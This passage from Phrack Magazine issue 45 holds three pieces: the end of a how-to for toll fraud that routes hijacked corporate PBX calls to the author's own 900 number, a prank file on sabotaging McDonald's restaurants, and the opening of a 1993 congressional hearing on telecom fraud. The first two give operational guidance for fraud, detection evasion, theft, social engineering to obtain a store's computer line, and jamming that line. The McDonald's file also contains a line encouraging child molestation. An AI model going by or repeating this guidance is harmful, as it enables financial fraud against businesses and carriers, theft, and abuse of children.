  12905. PBXes totally to be attacked for the month.  Each PBX is to be used only once per
  12906. billing period.  You will  get many months of use out of each PBX with this
  12907. conservative approach, so long as every hacker west of Poland doesn't have
  12908. access as well.  Notice how the number of connection minutes varies, and the
  12909. calling pattern is quite random looking.  The schedule is maintained not only
  12910. to keep track of PBXes in your harem you've fucked for the month, but to assist
  12911. you in generating minutes in a pseudo-random pattern.  It is acceptable to have
  12912. your minutes generated in a pattern, albeit a loose one.  For instance, if all
  12913. minutes are generated only on the weekend, a discerning eye will not attribute
  12914. this to the type of marketing you are using.  The sample schedule is only the
  12915. ideal model.  Having to rigid a pattern, however, such as having an exact
  12916. number of calls each day, is potentially suspicious to your service bureau.
  12917. Simultaneous calls to your 900 number through different outgoing trunks on the
  12918. same PBX is also strongly discouraged.
  12919.  
  12920. Listening Software
  12921.  
  12922. Calling your 900 dateline number is fun, but when you've got over a hundred
  12923. PBXes to hit each month for an average of fifteen minutes a pop, the novelty
  12924. tends to wear off.  Of course you can have a speakerphone and a time and go
  12925. about other tasks between calls, but why not write a program that will enable
  12926. your modem to do all this for you?  All the program must do is have the modem
  12927. call a PBX from a list, pause, and call your 900 (or another PBX and then your
  12928. 900, for LD PBX attacks).  Once connected to your 900, it must stay "listening"
  12929. until a random timer (10-20 minutes) hangs it up.  Depending upon your dateline
  12930. service, the modem may have to emit a DTMF every once in a while to keep the
  12931. service convinced you're still there.  This is a very worthwhile program to
  12932. write--it can drastically reduce your total time spent with this operation,
  12933. leaving you with only the PBX list to maintain (additions and deletions), and
  12934. the spending of your hard-earned cash (the novelty of this WON'T wear off).
  12935.  
  12936. Large Charge-Rate Option
  12937.  
  12938. A 900 number can be set up to charge as much as $50 per call.  Whether the call
  12939. lasts less then a minute, or for over ten, the cost for the caller is the same
  12940. $50.  In order to set up such an account, you must qualify as an "Information
  12941. Provider," or IP.  Regulations on 900 numbers state that you must be a provider
  12942. of information, not tangible goods.  With a dateline, the information is
  12943. included in your deal with the service bureau, so you are considered an IP.
  12944. The bureau can provide you with your own number that terminates in a voice
  12945. processing or audio-text system, but now you must provide the actual
  12946. information.  Your idea must be approved by the LD carrier, and they tend to
  12947. scrutinize your plans the higher your desired rate.  Your bureau may even
  12948. subject your service to a test to make sure it's not a fake.
  12949.  
  12950. One idea is to ask for a $25 per-call rate.  Make like a writer of shareware
  12951. programs, and have your 900's announcement ask the caller to leave name and
  12952. address to be legally registered to use the software, and to receive updated
  12953. versions.  A confirmation notice will be sent to acknowledge the registration.
  12954. Many bureaus will accept this as qualification for IP status, if properly
  12955. presented.  A sample arrangement like this should not cost more than a grand to
  12956. set up.  Stats on minutes are checked just as with the dateline, only you'll
  12957. receive any messages left by callers, and you'll receive any messages left by
  12958. callers, and you'll be able to change the announcements--just like voice mail.
  12959. [IT's always a thrill to call a 900 number and hear yourself thanking the
  12960. caller, heh heh.]  On a $25 line, you should net about $19 per call.
  12961.  
  12962. All the same rules apply using this large charge-rate setup.  You can't abuse a
  12963. PBX any more with this option then with a dateline.  It does give you the added
  12964. flexibility for methods used other than PBXes, such as outdials that will only
  12965. connect briefly.  For instance, message notification on voicemail will not
  12966. connect to a number for prolonged durations, but long enough to activate a $25
  12967. charge.  And a typical modem outdial on a mainframe will soon hang up with the
  12968. absence of an answering carrier, but the linger is long enough for a $25 call.
  12969. And with CO switching, the arrangements you make are ideally temporary--turned
  12970. quickly on and off--making a fast $25 hit optimal.  Lastly, if you are skilled
  12971. in accessing corporate phone closets (see "Physical Access and Theft," Phrack
  12972. 43) or the corresponding outside plant, you can use your test set to call your
  12973. 900.  Obviously a large charge-rate would be better here too, rather than
  12974. standing for endless periods of time in compromising positions connected to a
  12975. squawking dateline.
  12976.  
  12977. No matter how you access business lines, be sure they belong to a large
  12978. company.  Definitely experiment, but do so in moderation--make any necessary
  12979. notes (like time and date of call) and wait for your 900 billing statement to
  12980. see if the call was paid for.  [Your billing statement, essentially a call
  12981. accounting summary, is created for each billing month by the LD carrier and
  12982. sent to you via the service bureau with your check.  It includes the calling
  12983. phone numbers, time, date, duration, etc. of all calls made to your number.]
  12984.  
  12985. A Final Word
  12986.  
  12987. It would be hard to get "busted" doing anything mentioned in this article.
  12988. Even if you're nabbed for misdemeanor PBX abuse, no one will ever imagine--let
  12989. alone try to prove--that the 900 number you were calling is your own.  [Hey,
  12990. you're just a desperately lonely guy!]  However, be wary of pen registers
  12991. (DNRs) if you've been up to other dark deeds, and set up your calling
  12992. operations at a safer place.  Don't check your minutes using any of the same
  12993. means that you use to generate them (a record of your calling into your 900
  12994. backdoor is probably the most incriminating track you can make).  Keep your 900
  12995. account anonymous, as with your address, voice mail, and ID/SSN.
  12996.  
  12997. Welcome to the dark side--and best of luck.
  12998.  
  12999.                         Sincerely,
  13000.  
  13001.                         CO/der DEC/oder
  13002.                         DSR
  13003.  
  13004. [ The Author can be reached, when the system is up, at:
  13005.   codec@crimelab.com ]
  13006.  
  13007.                               ==Phrack Magazine==
  13008.  
  13009.                  Volume Five, Issue Forty-Five, File 19 of 28
  13010.  
  13011. ****************************************************************************
  13012.  
  13013.  
  13014. [** NOTE:  The following file is presented for informational and
  13015.            entertainment purposes only.  Phrack Magazine takes NO
  13016.            responsibility for anyone who attempts the actions
  13017.            described within. **]
  13018.  
  13019. ****************************************************************************
  13020.  
  13021.                      Screwing over your local McDonald's
  13022.                                 - Charlie X -
  13023.  
  13024. INTRODUCTION
  13025.  
  13026.      Ok... everyone is familiar with the world's largest and fastest
  13027. growing fast food chain, McDonald's. The founder, Ray "Crock", wanted an
  13028. environment where families and friends could get food with friendly
  13029. service at any time of the day... Boy, what a crock, at least now.
  13030.  
  13031.     To top everything off, McDonald's attacks decent food establishments
  13032. by criticizing the food content... not like you'll find anything not
  13033. genetically engineered in McDonald's food... Everyone must realize that
  13034. McDonald's sucks, and you must do your part to put the fucking place out
  13035. of commission...
  13036.  
  13037.      As far as I can tell, everyone in McDonald's is rude and has an
  13038. attitude, from the management to the customer. They, as most
  13039. restaurants do, firmly believe THE CUSTOMER IS ALWAYS RIGHT. This is
  13040. true even when the customer is an asshole with blind disregard for
  13041. everyone and everything. This is where you come in... Here are a few
  13042. things that you can do to put your local McDonald's in it's place...
  13043.  
  13044.      Recently in the news, a major group sited McDonald's as the most
  13045. environmentally responsible establishment on the planet (note: this is
  13046. even over green peace and Sally Struthers)... how the hell is this
  13047. possible?
  13048.  
  13049. SENIOR CITIZENS BENEFIT DAY/WEEK
  13050.  
  13051.      McDonald's is nice to senior citizens. Every McDonald's offers
  13052. free or reduced price meals or drinks to Senior citizens... Now, all
  13053. you have to do is attract them. For a minimal price, you can publish
  13054. an ad in the local newspaper, or publish your own flier (can be
  13055. cheaply made) which explains that a certain day/week, your local
  13056. McDonald's will recognize senior citizens with free food, coffee,
  13057. senior activities, you know... a big senior social. You may want to
  13058. mention that other organizations will be there to speak and make the
  13059. whole "event" decent... Now, if your McDonald's already offers
  13060. free/reduced coffee, food, or sodas, this will definitely break them,
  13061. and cause them to order much more supply, and could even cause them
  13062. to run out of coffee or soda for the rest of the day... on the other
  13063. hand, if they don't offer this, the mass crowd of old people asking
  13064. for shit will certainly piss someone off... This has been tested, and
  13065. as a result, a McDonald's had to close for a day to reorganize and
  13066. reorder supplies, as well as "launch an investigation" about this
  13067. Day, but they never turned up anything.
  13068.  
  13069. GARBAGE CAN TRICKS
  13070.  
  13071.      Since McDonald's is usually a busy restaurant, the trash bags
  13072. fill up quickly and must be changed frequently (but never are.) There
  13073. are several things you can do to the trash cans. For starters, ask
  13074. for hot or boiling water. If you don't want to attract attention by
  13075. doing this, bring in your own really hot water... boil it, put it in
  13076. a Styrofoam cup or a thermos... once in McDonald's, locate the filled
  13077. trash can (should not be hard to find) and dump the hot water down
  13078. the side. Not only will this melt the side of the bag, causing the
  13079. trash to go everywhere, the person who takes out the garbage must
  13080. pick up all the trash by hand and dump out the trash can with water
  13081. in the bottom. This also soaks the trash, breaks up paper, and makes
  13082. the whole experience quite unpleasant, but hilarious to watch.
  13083.  
  13084.      Another easy trick is to walk up to the trash can areas, take
  13085. the trays sitting above the trash cans, and simply throw them in all
  13086. the cans. This will either make the employee fish them out by hand,
  13087. or will cause the restaurant to be short of several trays, which
  13088. becomes quite annoying.
  13089.  
  13090. FOOD TRICKS
  13091.  
  13092.      There are several things to do with the food. Since there is
  13093. probably something wrong with it in the first place, you might want
  13094. to simply make the problem bigger... Before you enter the restaurant,
  13095. cut some of your hair, or hair off of a pet. When at your table,
  13096. place the hair all over the inside of the burger. When the line at
  13097. the counter is long, and everyone is busy, cut up to the front of the
  13098. counter, and start complaining about your burger. Show EVERYONE the
  13099. hair inside the burger. You will get another burger, and most likely,
  13100. a lot of free shit so you will come back. You will also cause most
  13101. everyone to leave, and people in the kitchen to get shit on by the
  13102. manager.
  13103.  
  13104. ON A BUSY DAY...
  13105.  
  13106.      Busy days are the best. Customers are in a hurry, so are the
  13107. employees... everyone has a short fuse and usually do not pay
  13108. attention to what you say, or get very pissed. Ask for real dumb
  13109. shit... For example, "I'd like a 69 piece Chicken McNugget." The best
  13110. thing to do is to order a simple cheeseburger, and screw it all up
  13111. with special orders... For example, "I'd like a cheeseburger, with
  13112. extra cheese, no mustard, extra catsup, extra onions, lettuce,
  13113. tomato, a real little dab of mayo, and make it well done... oh wait,
  13114. I don't want cheese anymore. Just put extra lettuce on it... [wait
  13115. for them to send the order back to the kitchen]... then Oh, wait,
  13116. sorry... I just want a BigMac." You can also say, "I'd like a medium
  13117. Coke with just 4 pieces of ice in it." They will always do what you
  13118. say... Keep in mind that special orders do not cost extra, so you can
  13119. order a hamburger, ask for extra mustard, catsup, and somewhere in
  13120. there, casually mention extra cheese... 9 times out of 10 this
  13121. works... and you don't get charged. NOTE: if you hear a printer
  13122. printing followed by 3 beeps somewhere in the kitchen, your grill
  13123. order was printed, and will be made... so change it after you hear
  13124. that.
  13125.  
  13126.      In some McDonald's, you will find the "Need A Penny - Take a
  13127. Penny," Where people put in their loose change in case someone else
  13128. is short some money... steal ALL the money in this. In one month, I
  13129. made $42.71 from stealing the money from all the Need A Penny cups in
  13130. my area... This is a good secondary income for lazy people.
  13131.  
  13132.      If you plan on a big order, start off by telling the person you
  13133. just want a soda. After they give a total and get ready to take your
  13134. money, add an item. Keep saying "That's it" and repeat this process
  13135. until you have what you wanted, and have wasted several minutes. You
  13136. can also have the cashier repeat your order as many times as you
  13137. wish, also wasting time.
  13138.  
  13139.  
  13140. THE INQUIRING CUSTOMER
  13141.  
  13142.      McDonald's managers pride themselves in knowing the answers,
  13143. and employees like to pretend that they do. So, on a busy day, keep
  13144. asking dumb questions... Here are a few to ask... Oh, never actually
  13145. order anything... just hold up the line with your questions. Here are
  13146. a few questions to ask:
  13147.  
  13148.      - "How is your meat prepared at the factory?"
  13149.      - "What part of the chicken does the McNugget come from?"
  13150.      - "Who was the BigMac named after?"
  13151.      - "What is the post-cooked weight of your quarter pounder?"
  13152.      - "Where does your <pick a vegetable> come from?"
  13153.      - "How fresh is your <McD product>?"
  13154.      - "What is the square root of 69.666?"
  13155.      - "What is the nutritional value of a 9 piece McNugget box?"
  13156.  
  13157. DRIVE-THRU FUN
  13158.  
  13159.      McDonald's videos tell the employees that the Drive Thru makes
  13160. up for more than 40% of the average McDonald's business. Simply put,
  13161. this system needs a lot of work. The speakers rarely work, and you
  13162. usually get your order screwed up. The first thing to do is to take
  13163. your car and back over the cut square in the pavement right beside
  13164. the order sign several times. This causes a loud annoying "bong" to
  13165. be heard by everyone with a headset... eventually the manager will
  13166. come out with a weapon, and this is where you leave.
  13167.  
  13168.      Another thing to do is to drive up, and say, "I just want a lot
  13169. of butter..." or "I'd like a large penis to go please." Usually,
  13170. people in the drive thru service will laugh or screw something up,
  13171. and you will get yelled at by the manager... waaah.
  13172.  
  13173.      If you want free food, order something in the drive thru. Keep
  13174. your window down to listen to other orders. After you receive your
  13175. food, park and enter the restaurant. Go to the front of the line and
  13176. tell the person on duty that your order was screwed up... it helps to
  13177. remember what someone else's order was, and then you just ask for
  13178. that... you will get it. Sometimes, you even get free food for having
  13179. a screwed up order.
  13180.  
  13181.      This prank requires guts, but can be somewhat amusing. Simply drive
  13182. up in front of the sign, turn your engine off, and go inside the restaurant
  13183. and eat. There's always room to park in the drive-thru lane... You could also
  13184. tell the drive-thru person that your car stalled, and you will have to call
  13185. the motor club. This can put a drive-thru out of commission until you decide
  13186. to move your car.
  13187.  
  13188.      If you happen across a McDonald's that is expecting deliveries, or has
  13189. cleaned the parking lot, you will notice traffic cones. You can move these
  13190. cones around the drive-thru sign. Some people are stupid and will drive thru
  13191. them anyway, so you may want to place a sign saying "DRIVE THRU CLOSED -
  13192. - SORRY - MANAGEMENT." You can also place a legitimate order at the drive thru
  13193. and right after your order, you can put a sign on the drive-thru sign saying
  13194. the same "closed" message. The drive thru sensor does not sense foot traffic,
  13195. so you can walk up to the sign and put one there...
  13196.  
  13197.      The drive thru headsets can be a good source of amusement. When
  13198. ordering, mumble your order, scream it real loud, or say it like the
  13199. microphone is cutting out, for example, "I'd like to order a LARGE
  13200. ibbit-obbt-ibbit-urger with no Sa... and extra <crackle> and I'd also
  13201. like a Med<cut> Oke." When they ask you to repeat, do the exact same
  13202. thing. Remember, that as soon as you drive up to the sign, they can
  13203. hear everything in your car... even if they are not talking. As soon
  13204. as they ask for your order, turn your stereo up real loud, and begin
  13205. to say your order... this screws everything up... Also, ask for a
  13206. hotdog, or an item that you know they don't have. If you have the
  13207. guts, are really bored, and are not driving YOUR car, take them
  13208. seriously when they say "please drive through." This would be the
  13209. ultimate action, putting your local McDonald's out of business.
  13210.  
  13211.     If you have a simple shortwave transceiver, Ham Radio, or powerful
  13212. handheld transceiver, you can talk to the entire drive-thru crew.
  13213. The antenna is located above the cashier in the drive-thru box and has
  13214. a receiving radius of the entire store and about half of the parking lot.
  13215. You can add stuff to peoples orders, or just screw around. Drive thru
  13216. people have noticed that illegally powerful CB radios, side band radios
  13217. and even some car phones can be picked up with the headsets. Be innovative
  13218. and use these to piss the employees off. If you do not have access to one,
  13219. simply hide behind the sign, and shout extra food or obscenities at
  13220. the sign...
  13221.  
  13222. GREASE DISPOSAL FUN
  13223.  
  13224.      This next trick involves little or no intelligence, or imagination,
  13225. but seems to get people every time. Behind McDonald's, usually found next
  13226. to trash cans or the empty soda-syrup containers, you will find a large
  13227. drum marked "not-fit for human consumption" or "inedible contents."
  13228. Although these warnings belong in the food, they mark the grease vat. This
  13229. is tightly sealed for a reason... it smells like dead human. They are also
  13230. easy to open. Usually, you can loosen the ring around the top and open
  13231. the lid. Be sure to cover your face when you do this... it does smell like
  13232. shit... The nice thing about this is that the smell will cover the entire
  13233. parking-lot area in roughly 10 minutes. Chemically, the smell will cause
  13234. nausea, and definitely a loss in appetite. People will get sick everywhere,
  13235. and definitely cause a loss of customers at McDonald's...
  13236.  
  13237.      A simple addition to the previous trick would be to tip the can. The
  13238. grease will probably have hardened, but on a warm day or if the black
  13239. can is left in the sun, it will leave a sticky, raunchy mess in the
  13240. parking lot that will be impossible to clean up, and will stink infinitely.
  13241. This is a way to make the trick more damaging and longer lasting.
  13242.  
  13243. DUMPSTER FUN
  13244.  
  13245.      McDonald's, or any fast food restaurant usually has a high volume of
  13246. garbage output (not including the food). If you can travel around and
  13247. find large objects, you can dispose of them in the trash containers. If
  13248. you clog them up, not only will the store have to pay for an extra
  13249. collection of trash (to remove what you put in there), They'll have to pay
  13250. extra for later (or earlier) you do it, as well as what kind of objects
  13251. you put in there. You can also put the empty silver soda containers, bread
  13252. racks, or even signs and loose McDonald's shit in the trash. They won't
  13253. appreciate the loss, and it's gonna cost them money at both ends. Lame
  13254. but definitely effective.
  13255.  
  13256. PHONE ORDER PHUN
  13257.  
  13258.      One thing that is not very well known is that McDonald's accepts phone
  13259. orders. This is a simple process. A serious, adult sounding voice can call
  13260. a local McDonald's and claim that they have a large order that they would like
  13261. ready for pickup. You supply a BS phone number, a BS name, and a BS order. The
  13262. larger it is the better. Usually give about a half an hour to an hour notice
  13263. to have the order ready. Good reasons for the orders are usually family get-
  13264. togethers, meetings at local universities, etc. The university excuses are much
  13265. better, because you can supply a college phone number (found in the phone book)
  13266. and if they call (the usually don't) to verify the order, they will get the
  13267. office, and will think it's legitimate. This prank is a beauty because after
  13268. the manager takes the order, it is given directly to the kitchen, who begins the
  13269. order. Again, they very rarely verify the orders, so it is easy to pull these
  13270. off. To make this prank better, you should throw in mass quantities of food
  13271. items that people NEVER eat -- Filet O' "Fish", Fajitas, etc... You can also
  13272. call them back at the time of pickup, and say "sorry, we decided to eat at
  13273. burger king..." DO NOT enter the restaurant and ask to buy the items at a
  13274. cheaper price, like the old pizza man trick... that's just lame.
  13275.  
  13276. COMPUTER PHUN
  13277.  
  13278.      A nice thing about McDonald's is that it is linked via computer (and modem)
  13279. to OakBrook, Illinois. Check your local phone book for a McDonald's with 2 lines.
  13280. The second line is usually the computer line. You may also try Information.
  13281. If you aren't able to get the number, read these next 3 parts...
  13282.  
  13283.      - McDonald's are listed by Restaurant number in the phonebook. You can
  13284.        retrieve the number, then call the restaurant, asking for the manager.
  13285.        When the manager identifies himself, with his name, you write the
  13286.        name down, and tell him to get bent or something.  With that information,
  13287.        you can call McDonald's 800 number, or any McDonald's Corporation HQ number
  13288.        in OakBrook, Illinois (they will relay your call). You say you haven't
  13289.        been receiving updates or any purchase orders, you identify yourself,
  13290.        and your store number, and location (city, state...). They will check
  13291.        the listings, and read off the phone number of the computer. If they
  13292.        won't give it to you, they will allow you to change the computer number,
  13293.        where you give them your enemies phone number or something, and they
  13294.        will get called by modem repeatedly...
  13295.      - Call your local McDonald's, identify yourself as Bill Haggan of Computer
  13296.        Services, McDonald's, Oakbrook... etc. Say you are updating your records,
  13297.        and need the computer telephone number. Get the number, then give them
  13298.        a bullshit verification number.
  13299.      - This is not very imaginative, but it works... it's also risky... wooooo.
  13300.        Find the phone box, open the user service box, connect any phone with an
  13301.        RJ-11 adaptor to the box and type your local ANI number (211, 811-9967)
  13302.        etc... do that for each line that enters the restaurant. Then reconnect
  13303.        it... you have the numbers.
  13304.  
  13305.      Now that you have the numbers, there is a lot you can do. It is not wise to
  13306. enter the computer. Although goodies are buried there, any changes you make are
  13307. corrected that night with a verification call. It is also verified voice.
  13308. However, everything in the restaurant is connected to the computer. Once you
  13309. call the number, and connect to the computer, just sit there. The computer
  13310. freezes all time clocks, order programs, etc. Every display will be marked
  13311. "BUSY." This prevents anyone from punching in or out, the manager from checking
  13312. labor, printing schedules, do inquiries about anything... basically interrupt
  13313. most managerial and owner duties. If you find a constant busy signal, this
  13314. is very easy to correct. Simply ask for an operator interrupt. If the operator
  13315. breaks in, the beep will hang up the modem, allowing you to call right in.
  13316. This prank does have profound effects on the McDonald's. It is highly
  13317. recommended.
  13318.  
  13319. FREE SHIT AT McDonald's
  13320.  
  13321.      Yes, I do mean shit... If you are involved in that fucking money crunch
  13322. like everyone else, and you feel that your money should be spent on better
  13323. things, rather than shitty food, here are a few pointers for free food.
  13324. These have all been tested. If you are caught in the act of getting free
  13325. food, nothing will happen, and it will be a big source of amusement...
  13326.  
  13327. Cheeseburger -  On a busy drive-thru day, you can ask for a special order.
  13328.   Ask for a hamburger with an extra item, like mustard or
  13329.                 something, and casually sneak in "extra cheese." If the
  13330.   employees are stupid enough (a given), and the grill doesn't
  13331.   question it, you will find yourself with a nice fresh
  13332.   cheeseburger for the price of a hamburger... whoopee...
  13333. Any Item -      The BEST thing to do is order something in the drivethru,
  13334.   and then come in the restaurant with the bag from drive
  13335.                 thru and say "You forgot ..." If you ask the employees at
  13336.   the counter, 9 times out of 10, you will get it... To be
  13337.   on the safe side, you may want to go home, call the
  13338.                 McDonald's, say you went through the drive thru and you
  13339.   didn't get your food item. You can give a bullshit name
  13340.    or whatever, usually they don't even take the name, and
  13341.   the next time you go in, you say you called, and you will
  13342.   get gift certificates or free food... works every time.
  13343.  
  13344. BASTARDIZING FOOD ITEMS
  13345.  
  13346.      If you want to attract a certain degree of attention to yourself, and
  13347. make employees and customers laugh, when you order food, fuck up the names
  13348. to say something cool... You'll still get the food you don't want, and this
  13349. too is a source of amusement. Spur-of-the-moment name bastardizations are
  13350. by far the funniest, but here are a few suggestions...
  13351.  
  13352. SHMEGMA MAC, SHMEGMA SACK - instead of Mega Mac (shmegma is Dick Cheese)
  13353. CHICKEN McFUCKUPS - Chicken McNuggets (be sure to ask for the 69 piece)
  13354. McDICKEN - McChicken (ask for extra Mayo and smile...)
  13355. CHOKE - Coke (I'd like a small choke with no ice)
  13356. McRIBBED FOR HER PLEASURE - McRib... Do they still make this?
  13357. FAGINA - Fajita (I'd like a FAGINA with extra cheese...)
  13358.  
  13359. IMPORTANT
  13360.  
  13361.      Remember that McDonald's slogan is Food, Folks, and Fun...
  13362. Just take the "fun" part to the limit... You sort of have to compensate
  13363. for the asshole "folks" and the shit "food."
  13364.  
  13365.      If you get bored, start molesting kids on the
  13366. playland or just break shit... throwing salt shakers (plastic or
  13367. glass) at the outside wall of the McDonald's is fun too... take
  13368. advantage of whatever there is in McDonald's... there are infinite
  13369. possibilities to create your local McDonald's an utter McHell. Don't
  13370. consider it illegal (most of it isn't...) consider it more of a
  13371. public service. Yeah... That's it.
  13372.                               ==Phrack Magazine==
  13373.  
  13374.                  Volume Five, Issue Forty-Five, File 20 of 28
  13375.  
  13376. ****************************************************************************
  13377.  
  13378.                     The Senator Markey Hearing Transcripts
  13379.  
  13380. [To obtain your own copy of this hearing and the other related ones,
  13381.  contact the U.S. Government Printing Office (202-512-0000) and ask
  13382.  for Serial No. 103-53, known as "Hearings Before The Subcommittee
  13383.  on Telecommunications and Finance of the Committee on Energy and
  13384.  Commerce, House of Representatives, One Hundred Third Congress,
  13385.  First Session, April 29 and June 9, 1993".]
  13386.  
  13387. ----------------------------------------------------------------------
  13388.  
  13389.      Mr. MARKEY. If you could close the door, please, we could move
  13390. on to this very important panel. It consists of Mr. Donald Delaney,
  13391. who is a senior investigator for the New York State Police. Mr.
  13392. Delaney has instructed telecommunications fraud at the Federal Law
  13393. Enforcement Training Center and has published chapters on computer
  13394. crime and telecommunications fraud. Dr. Peter Tippett is an expert
  13395. in computer viruses and is the director of security products for
  13396. Symantec Corporation in California. Mr. John J. Haugh is chairman
  13397. of Telecommunications Advisors Incorporated, a telecommunications
  13398. consulting firm in Portland, Oreg., specializing in network
  13399. security issues. Dr. Haugh is the editor and principal author of
  13400. two volumes entitled "Toll Fraud" and "Telabuse" in a newsletter
  13401. entitled "Telecom and Network Security Review." Mr. Emmanuel
  13402. Goldstein is the editor-in-chief of "2600: The Hacker Quarterly."
  13403. Mr. Goldstein also hosts a weekly radio program in New York called
  13404. "Off The Hook." Mr. Michael Guidry is chairman and founder of the
  13405. Guidry Group, a security consulting firm specializing in
  13406. telecommunications issues. The Guidry Group works extensively with
  13407. the cellular industry in its fight against cellular fraud.
  13408.      We will begin with you, Mr. Delaney, if we could. You each
  13409. have 5 minutes. We will be monitoring that. Please try to abide by
  13410. the limitation. Whenever you are ready, please begin.
  13411.      STATEMENTS OF DONALD P. DELANEY, SENIOR INVESTIGATOR, NEW YORK
  13412. STATE POLICE; JOHN J. HAUGH, CHAIRMAN, TELECOMMUNICATIONS ADVISORS;
  13413. EMMANUEL GOLDSTEIN, PUBLISHER, 2600 MAGAZINE; PETER S. TIPPETT,
  13414. DIRECTOR, SECURITY AND ENTERPRISE PRODUCTS, SYMANTEC CORP.; AND
  13415. MICHAEL A. GUIDRY, CHIEF EXECUTIVE OFFICER, THE GUIDRY GROUP
  13416.      Mr. DELANEY. Thank you, Mr. Chairman, for the invitation to
  13417. testify today.
  13418.      As a senior investigator with the New York State Police, I
  13419. have spent more than 3 years investigating computer crime and
  13420. telecommunications fraud. I have executed more than 30 search
  13421. warrants and arrested more than 30 individuals responsible for the
  13422. entire spectrum of crime in this area.
  13423.      I authored two chapters in the "Civil and Criminal
  13424. Investigating Handbook" published by McGraw Hill entitled
  13425. "Investigating Computer Crime and Investigating Telecommunications
  13426. Fraud." Periodically I teach a 4-hour block instruction on
  13427. telecommunications fraud at the Federal Law Enforcement Training
  13428. Center in Georgia.
  13429.      Although I have arrested some infamous teenagers, such as
  13430. Phiber Optic, ZOD, and Kong, in some cases the investigations were
  13431. actually conducted by the United States Secret Service. Because
  13432. Federal law designates a juvenile as one less than 18 years of age
  13433. and the Federal system has no means of prosecuting a juvenile,
  13434. malicious hackers, predominately between 13 and 17 years of age,
  13435. are either left unprosecuted or turned over to local law
  13436. enforcement. In some cases, local law enforcement were either
  13437. untrained or unwilling to investigate the high-tech crime.
  13438.      In examining telecommunications security, one first realizes
  13439. that all telecommunications is controlled by computers. Computer
  13440. criminals abuse these systems not only for free service but for a
  13441. variety of crimes ranging from harassment to grand larceny and
  13442. illegal wiretapping. Corporate and Government espionage rely on the
  13443. user-friendly networks which connect universities, military
  13444. institutions, Government offices, corporate research and
  13445. development computers. Information theft is common from those
  13446. companies which hold our credit histories. Their lack of security
  13447. endanger each of us, but they are not held accountable.
  13448.      One activity which has had a financial impact on everyone
  13449. present is the proliferation of call sell operations. Using a
  13450. variety of methods, such as rechipped cellular telephones,
  13451. compromised PBX remote access units, or a combination of cellular
  13452. phone and international conference lines, the entrepreneur deprives
  13453. the telephone companies of hundreds of millions of dollars each
  13454. year. These losses are passed on to each of us as higher rates.
  13455.      The horrible PBX problem exists because a few dozen finger
  13456. hackers crack the codes and disseminate them to those who control
  13457. the pay phones. The major long distance carriers each have the
  13458. ability to monitor their 800 service lines for sudden peaks in use.
  13459. A concerted effort should be made by the long distance carriers to
  13460. identify the finger hackers, have the local telephone companies
  13461. monitor the necessary dialed number recorders, and provide local
  13462. law enforcement with timely affidavits. Those we have arrested for
  13463. finger hacking the PBX's have not gone back into this type of
  13464. activity or crime.
  13465.      The New York State Police have four newly trained
  13466. investigators assigned to investigate telecommunications fraud in
  13467. New York City alone. One new program sponsored by AT&T is
  13468. responsible for having trained police officers from over 75
  13469. departments about this growing blight in New York State alone.
  13470.      Publications, such as "2600," which teach subscribers how to
  13471. commit telecommunications crime are protected by the First
  13472. Amendment, but disseminating pornography to minors is illegal. In
  13473. that many of the phone freaks are juveniles, I believe legislation
  13474. banning the dissemination to juveniles of manuals on how to commit
  13475. crime would be appropriate.
  13476.      From a law enforcement perspective, I applaud the proposed
  13477. Clipper chip encryption standard which affords individuals
  13478. protection of privacy yet enables law enforcement to conduct
  13479. necessary court-ordered wiretaps, and with respect to what was
  13480. being said in the previous conversation, last year there were over
  13481. 900 court-ordered wiretaps in the United States responsible for the
  13482. seizure of tons of illicit drugs coming into this country, solving
  13483. homicides, rapes, kidnappings. If we went to an encryption standard
  13484. without the ability for law enforcement to do something about it,
  13485. we would have havoc in the United States -- my personal opinion.
  13486.      In New York State an individual becomes an adult at 16 years
  13487. old and can be prosecuted as such, but if a crime being
  13488. investigated is a Federal violation he must be 18 years of age to
  13489. be prosecuted. Even in New York State juveniles can be adjudicated
  13490. and given relevant punishment, such as community service.
  13491.      I believe that funding law enforcement education programs
  13492. regarding high-tech crime investigations, as exists at the Federal
  13493. Law Enforcement Training Center's Financial Frauds Institute, is
  13494. one of the best tools our Government has to protect its people with
  13495. regard to law enforcement.
  13496.      Thank you.
  13497.      Mr. WYDEN [presiding]. Thank you very much for a very helpful
  13498. presentation.
  13499.      Let us go next to Mr. Haugh.
  13500.      We welcome you. It is a pleasure to have an Oregonian,
  13501. particularly an Oregonian who has done so much in this field, with
  13502. the subcommittee today. I also want to thank Chairman Markey and
  13503. his excellent staff for all their efforts to make your attendance
  13504. possible today.
  13505.      So, Mr. Haugh, we welcome you, and I know the chairman is
  13506. going to be back here in just a moment.
  13507.      STATEMENT OF JOHN J. HAUGH
  13508.      Mr. HAUGH. Thank you, Mr. Wyden.
  13509.      We expended some 9,000 hours, 11 different people, researching
  13510. the problem of toll fraud, penetrating telecommunications systems,
  13511. and then stealing long distance, leading up to the publication of
  13512. our two-volume reference work in mid-1992. We have since spent
  13513. about 5,000 additional hours continuing to monitor the problem, and
  13514. we come to the table with a unique perspective because we are
  13515. vender, carrier, and user independent.
  13516.      In the prior panel, the distinguished gentleman from AT&T, for
  13517. whom I have a lot of personal respect, made the comment that the
  13518. public justifiably is confident that the national wire network is
  13519. secure and that the problem is wireless. With all due respect, that
  13520. is a laudable goal, but as far as what is going on today, just
  13521. practical reality, that comment is simply incorrect, and if the
  13522. public truly is confident that the wired network is secure, that
  13523. confidence is grossly misplaced.
  13524.      We believe 35,000 users will become victimized by toll fraud
  13525. this year, 1993. We believe the national problem totals somewhere
  13526. between $4 and $5 billion. It is a very serious national problem.
  13527. We commend the chairman and this committee for continuing to
  13528. attempt to draw public attention and focus on the problem.
  13529.      The good news, as we see it, over the last 3 years is that the
  13530. severity of losses has decreased. There is better monitoring,
  13531. particularly on the part of the long distance carriers, there is
  13532. more awareness on the part of users who are being more careful
  13533. about monitoring and managing their own systems, as a result of
  13534. which the severity of loss is decreasing. That is the good news.
  13535.      The bad news is that the frequency is greatly increasing, so
  13536. while severity is decreasing, frequency is increasing, and I will
  13537. give you some examples. In 1991 we studied the problem from 1988 to
  13538. 1991 and concluded that the average toll fraud loss was $168,000.
  13539. We did a national survey from November of last year to March of
  13540. this year, and the average loss was $125,000, although it was
  13541. retrospective. Today we think the average loss is $30,000 to
  13542. $60,000, which shows a rather dramatic decline.
  13543.      The problem is, as the long distance thieves, sometimes called
  13544. hackers, are rooted out of one system, one user system, they
  13545. immediately hop into another one. So severity is dropping, but
  13546. frequency is increasing. Everybody is victimized. You have heard
  13547. business users with some very dramatic and very sad tales. The
  13548. truth is that everybody is victimized; the users are victimized;
  13549. the long distance carriers are victimized; the cellular carriers
